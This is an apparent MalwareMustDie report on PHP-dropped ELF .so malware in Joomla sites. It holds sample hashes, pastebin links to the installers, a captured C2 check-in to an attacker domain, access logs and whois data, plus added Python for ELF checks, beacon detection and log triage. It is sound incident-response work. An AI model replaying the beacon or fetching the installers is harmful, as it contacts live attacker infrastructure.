- # MalwareMustDie NEW Report of .SO ELF Malware attack incident.
- # date: Wed Jun 11 06:38:13 JST 2014
- # Analysis by @unixfreaxjp - Report thx to: yin
- # Case: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
- # CNC is ALIVE in : 89.45.14.64 (VOXILITY, ROMANIA)
- # ATTACKER SOURCE IP: 103.31.186.33 (VOXILITY, ROMANIA) & 31.202.247.234 (Leased line ISP Format, UKRAINE)
- //-------------------------------------
- // PHP HACK INJECTION POC
- // VICTIMS WEBAPP: JOOMLA!
- //-------------------------------------
- // Reported Injected installation .SO Bins
- https://www.virustotal.com/en/file/324b1b77ff9c0759e3d2ab1efb9439a3a850d94bd9f1968a0f093a782b5ea990/analysis/1402437076/
- https://www.virustotal.com/en/file/203eeac48d08cac9b36187bfb32bd88d29f1f44d4306f2ffc154538573e5d722/analysis/1402437106/
- // Jinxed code installer PHP scripts in pastebin:
- http://pastebin.com/z1K8jxKJ
- http://pastebin.com/Pbsk3ZXU
- // Malware Binaries extracted from installer PHP:
- https://www.virustotal.com/en/file/c28e2ebc5046c1a03a8f689b757cf2a90d021eeaa0a5e9ec91aa33c76ee6237f/analysis/1402437331/
- https://www.virustotal.com/en/file/af71138bc3b2e70fd1d8fd33c31a4707d686d893661a331aee68f223348e164e/analysis/1402437372/
- //-------------------------------------
- // CNC ANALYSIS
- // Using knowhow from: http://blog.malwaremustdie.org/2014/05/elf-shared-so-dynamic-library-malware.html
- //-------------------------------------
- // Extract the bins w/ template:
- $ date
- Wed Jun 11 04:12:11 JST 2014
- $
- $ php ./sodump-template.php
- SO x32 dumped 26848
- SO x64 dumped 27288
- MO x32 dumped 26848
- MO x64 dumped 27288
- $
- $ ls -alF
- total 600
- drwxrwxrwx 2 xxx xxx 512 Jun 11 04:12 ./
- drwxrwxrwx 13 xxx xxx 512 Jun 11 03:59 ../
- -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 libworker1-32.so
- -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 libworker1-64.so
- -rw-r--r-- 1 xxx xxx 26848 Jun 11 04:12 libworker2-32.so
- -rw-r--r-- 1 xxx xxx 27288 Jun 11 04:12 libworker2-64.so
- $ md5 lib*
- MD5 (libworker1-32.so) = 15584bc865d01b7adb7785f27ac60233
- MD5 (libworker1-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
- MD5 (libworker2-32.so) = 15584bc865d01b7adb7785f27ac60233
- MD5 (libworker2-64.so) = f9aeda08db9fa8c1877e05fe0fd8ed21
- // note: both installers drop the same two binaries (identical MD5 per architecture), so only one x32 and one x64 payload are in use across the injections.
- $ file lib*
- libworker1-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
- libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
- libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
- libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
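Before trusting `file` and `md5` on blobs carved out of a PHP installer, it is worth checking the ELF header yourself: a dump that is off by a few bytes still hashes fine but is no longer a loadable shared object. The following is an added example (not code from the report or from the malware installer) that reads the ELF identification bytes and e_type/e_machine fields to reproduce the `file`-style description above, and groups dumped files by MD5 to show the "one x32, one x64" reuse. The sample headers are constructed in the block; the real libworker*.so bytes are not reproduced here.

```python
"""Sanity-check dumped blobs as ELF shared objects and dedupe them by MD5 (added example)."""
import hashlib
import struct
from collections import defaultdict
from typing import Dict, List

ELF_MAGIC = b"\x7fELF"
CLASSES = {1: "32-bit", 2: "64-bit"}          # e_ident[EI_CLASS]
ENDIAN = {1: "LSB", 2: "MSB"}                 # e_ident[EI_DATA]
TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core file"}  # e_type
MACHINES = {3: "Intel 80386", 62: "x86-64", 40: "ARM", 183: "AArch64"}          # e_machine
OSABI = {0: "SYSV", 3: "GNU/Linux"}           # e_ident[EI_OSABI]


def describe_elf(data: bytes) -> str:
    """Return a `file`-style one-liner built from the ELF header, or raise ValueError.

    Only the first 64 bytes are inspected; anything that is not a complete,
    well-formed header (e.g. a PHP-wrapped or truncated dump) is rejected.
    """
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    ei_class, ei_data, ei_version, ei_osabi = data[4], data[5], data[6], data[7]
    if ei_class not in CLASSES or ei_data not in ENDIAN:
        raise ValueError("corrupt e_ident")
    ehsize = 52 if ei_class == 1 else 64
    if len(data) < ehsize:
        raise ValueError("truncated ELF header")
    # e_type and e_machine are Elf_Half values at offset 16, in the file's own byte order.
    fmt = "<HH" if ei_data == 1 else ">HH"
    e_type, e_machine = struct.unpack_from(fmt, data, 16)
    return "ELF {} {} {}, {}, version {} ({})".format(
        CLASSES[ei_class],
        ENDIAN[ei_data],
        TYPES.get(e_type, "type %d" % e_type),
        MACHINES.get(e_machine, "machine %d" % e_machine),
        ei_version,
        OSABI.get(ei_osabi, "OSABI %d" % ei_osabi),
    )


def dedupe_by_md5(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map md5 hex digest -> sorted list of file names sharing that digest."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for name, data in files.items():
        groups[hashlib.md5(data).hexdigest()].append(name)
    return {digest: sorted(names) for digest, names in groups.items()}


def make_fake_so(ei_class: int, e_machine: int) -> bytes:
    """Constructed sample: a minimal ELF header for an ET_DYN (shared object) image.

    Only the header is produced (52 bytes for 32-bit, 64 for 64-bit); there are no
    sections or code, so it is enough to exercise describe_elf() and nothing more.
    """
    ehsize = 52 if ei_class == 1 else 64
    ident = ELF_MAGIC + bytes([ei_class, 1, 1, 0, 0]) + bytes(7)  # LSB, version 1, SYSV
    return ident + struct.pack("<HHI", 3, e_machine, 1) + bytes(ehsize - 24)


if __name__ == "__main__":
    dumped = {
        "libworker1-32.so": make_fake_so(1, 3),
        "libworker2-32.so": make_fake_so(1, 3),
        "libworker1-64.so": make_fake_so(2, 62),
        "libworker2-64.so": make_fake_so(2, 62),
    }
    for name, blob in sorted(dumped.items()):
        print(f"{name}: {describe_elf(blob)}")
    for digest, names in dedupe_by_md5(dumped).items():
        print(digest, names)
```

Run against the real dumps by reading each `libworker*.so` into the dict instead of the constructed headers; two MD5 groups with two names each is the same picture the `md5 lib*` listing above shows.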
- $
- // CNC:
- POST /kuku/theend.php HTTP/1.0
- Host: erstoryunics.us
- Pragma: 1337
- Content-Length: 84
- R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
- HTTP/1.1 200 OK
- Date: Tue, 10 Jun 2014 22:12:22 GMT
- Server: Apache/2.2.15 (CentOS)
- X-Powered-By: PHP/5.3.3
- Content-Length: 6
- Connection: close
- Content-Type: text/html; charset=UTF-8
- R,200
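The check-in above is easy to fingerprint on the wire: a POST to the panel script, a non-standard `Pragma: 1337` header, and a comma-separated body starting with `R,` answered by a bare `R,200`. The following is an added example (not part of the report, and not the malware's or the panel's code) that parses a raw HTTP request and response and flags this exchange. The field names given to the body columns (`build`, `arch`, and so on) are my guesses from the one sample shown and are not confirmed by the report; the sample request and response are reconstructed from the exchange above, with Content-Length recomputed from the body actually embedded here.

```python
"""Detect the CNC check-in exchange shown above (added example)."""
import re
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Body columns as seen in the single sample: names are assumptions, not documented fields.
BEACON_RE = re.compile(r"^R,(?P<build>\d{8}),(?P<arch>32|64),(?P<flag>\d+),(?P<extra>[^,]*),(?P<uname>[^,]*),")
MAGIC_PRAGMA = "1337"


@dataclass
class Beacon:
    path: str
    host: str
    build: str
    arch: str
    flag: str
    extra: str
    uname: str


def split_http(raw: bytes) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into (start line, lower-cased headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF captures
        head, _, body = raw.partition(b"\n\n")
    lines = head.replace(b"\r\n", b"\n").decode("latin-1").split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return lines[0].strip(), headers, body.decode("latin-1")


def parse_beacon(raw_request: bytes) -> Optional[Beacon]:
    """Return a Beacon if the request matches the check-in pattern, else None."""
    start, headers, body = split_http(raw_request)
    parts = start.split()
    if len(parts) != 3 or parts[0] != "POST":
        return None
    if headers.get("pragma") != MAGIC_PRAGMA:
        return None
    m = BEACON_RE.match(body)
    if not m:
        return None
    return Beacon(path=parts[1], host=headers.get("host", ""), **m.groupdict())


def is_cnc_ack(raw_response: bytes) -> bool:
    """True for the panel's acknowledgement: HTTP 200 with a body of exactly 'R,200'."""
    start, _, body = split_http(raw_response)
    return start.startswith("HTTP/1.") and " 200 " in start + " " and body.strip() == "R,200"


# Constructed samples, reconstructed from the exchange in the report.
_BODY = b"R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,"
SAMPLE_REQUEST = (
    b"POST /kuku/theend.php HTTP/1.0\r\n"
    b"Host: erstoryunics.us\r\n"
    b"Pragma: 1337\r\n"
    + b"Content-Length: %d\r\n" % len(_BODY)
    + b"\r\n" + _BODY
)
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 10 Jun 2014 22:12:22 GMT\r\n"
    b"Server: Apache/2.2.15 (CentOS)\r\n"
    b"X-Powered-By: PHP/5.3.3\r\n"
    b"Content-Length: 6\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
    b"R,200\n"
)

if __name__ == "__main__":
    b = parse_beacon(SAMPLE_REQUEST)
    print("beacon:", b)
    print("panel ack:", is_cnc_ack(SAMPLE_RESPONSE))
```

For a proxy or IDS rule, the `Pragma: 1337` header plus a body matching `^R,\d{8},(32|64),` is the part to key on; the host name and path can change between campaigns, the protocol framing is what the library implements.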
- // CNC INFO (NETWORK & GEOIP)
- $ echo `dig +short erstoryunics.us`|bash origin.sh
- Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
- IP Address, City, Country Name, Latitude, longitude, Time Zone
- 89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest
- //-------------------------------------
- // ATTACK TIME RANGE:
- //-------------------------------------
- First session: [22/May/2014:13:01:08 +1000]
- 2nd Session First: [08/Jun/2014:06:25:18 +1000] (earliest hit from 103.31.186.33 in the log excerpt below, /jquery.js.php)
- 2nd Session Latest:[10/Jun/2014:04:39:51 +1000]
- //-------------------------------------
- // ATTACKER ACCESS POC & SOURCE IP POC:
- //-------------------------------------
- // Attacker access log aiming the PHP .SO Malware installer PHP script:
- 103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
- 103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
- 31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
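The session ranges above fall straight out of the access log once hits to the installer scripts are grouped by source IP. The following is an added example (not the report's tooling) that parses Apache combined-format lines, keeps requests to the dropper paths seen here, and reports per-IP hit count, first and last timestamp, and whether the client sent no User-Agent, which separates the scripted 71-byte probes from the one browser visit. The sample lines are the ones quoted above; the path list and the "empty UA means scripted" heuristic are assumptions drawn from this excerpt.

```python
"""Per-source-IP triage of installer-script hits in an Apache access log (added example)."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Sample lines copied from the access-log excerpt in the report.
SAMPLE_LOG = """\
103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed from this excerpt: PHP droppers named to look like static assets or cache files.
INSTALLER_PATHS = {"/cache.php", "/jquery.js.php", "/cache/cache.php"}


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["scripted"] = rec["ua"] == "-"  # heuristic: no User-Agent => tool, not a browser
    return rec


def summarize(log_text: str) -> Dict[str, dict]:
    """Group installer-path hits by source IP with first/last timestamps."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"] in INSTALLER_PATHS:
            by_ip[rec["ip"]].append(rec)
    summary = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        summary[ip] = {
            "hits": len(recs),
            "first": recs[0]["ts"],
            "last": recs[-1]["ts"],
            "paths": sorted({r["path"] for r in recs}),
            "scripted_hits": sum(r["scripted"] for r in recs),
        }
    return summary


def overall_range(summary: Dict[str, dict]) -> Tuple[datetime, datetime]:
    """Earliest first-seen and latest last-seen across all source IPs."""
    return (min(s["first"] for s in summary.values()),
            max(s["last"] for s in summary.values()))


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for ip, info in sorted(s.items(), key=lambda kv: kv[1]["first"]):
        print(ip, info["hits"], info["first"], info["last"], info["paths"], info["scripted_hits"])
    print("attack window:", overall_range(s))
```

Feed it the full access log rather than the excerpt and widen `INSTALLER_PATHS` to whatever `.php` files the installer wrote; the output is the same first/last table the report gives by hand, with the 08/Jun entries included.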
- //-------------------------------------
- // Tracing attacker source IP: 103.31.186.33 (ROMANIA)
- //-------------------------------------
- $ whois 103.31.186.33
- % [whois.apnic.net]
- % Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
- % Information related to '103.31.186.0 - 103.31.186.127'
- inetnum: 103.31.186.0 - 103.31.186.127
- netname: Saulhost
- descr: Saulhost Hosting
- country: RO
- admin-c: MT669-AP
- tech-c: MT669-AP
- status: ASSIGNED NON-PORTABLE
- remarks: INFRA-AW
- mnt-by: MAINT-HK-VOXILITY
- mnt-lower: MAINT-HK-VOXILITY
- mnt-routes: MAINT-HK-VOXILITY
- mnt-irt: IRT-VOXILITY-AP
- changed: noc@voxility.com 20130118
- source: APNIC
- irt: IRT-VOXILITY-AP
- address: Dimitrie Pompeiu 9-9A
- address: Building 24
- address: Bucharest 020335
- address: Romania
- e-mail: noc@voxility.com
- abuse-mailbox: noc@voxility.com
- admin-c: VOX100
- tech-c: VOX100
- auth: # Filtered
- mnt-by: MAINT-HK-VOXILITY
- changed: noc@voxility.com 20121015
- source: APNIC
- person: Michael Ter-Sahakyan
- address: Terbatas 14
- address: LV-1011 Riga
- address: Latvia
- country: RO
- phone: +37166163312
- e-mail: abuses@saulhost.com
- nic-hdl: MT669-AP
- remarks: INFRA-AW
- abuse-mailbox: abuses@saulhost.com
- mnt-by: MAINT-HK-VOXILITY
- changed: noc@voxility.com 20130118
- source: APNIC
- //-------------------------------------
- // Tracing attacker source IP: 31.202.247.234 (UKRAINE)
- //-------------------------------------
- $ whois 31.202.247.234
- % This is the RIPE Database query service.
- % The objects are in RPSL format.
- %
- % The RIPE Database is subject to Terms and Conditions.
- % See http://www.ripe.net/db/support/db-terms-conditions.pdf
- % Note: this output has been filtered.
- % To receive output for a database update, use the "-B" flag.
- % Information related to '31.202.192.0 - 31.202.255.255'
- % Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
- inetnum: 31.202.192.0 - 31.202.255.255
- netname: FORMAT-TV-NET-5
- descr: MSP Format Ltd.
- country: UA
- admin-c: FA4288-RIPE
- tech-c: FA4288-RIPE
- status: ASSIGNED PA
- mnt-by: FORMAT-TV-MNT
- mnt-domains: FORMAT-TV-MNT
- mnt-routes: FORMAT-TV-MNT
- source: RIPE # Filtered
- person: Format Admin
- address: Ukraine Mariupol
- phone: +380629422490
- nic-hdl: FA4288-RIPE
- mnt-by: FORMAT-TV-MNT
- source: RIPE # Filtered
- % Information related to '31.202.247.0/24AS6712'
- route: 31.202.247.0/24
- descr: Leased line ISP Format
- origin: AS6712
- mnt-by: FORMAT-TV-MNT
- source: RIPE # Filtered
- ---
- #MalwareMustDie!!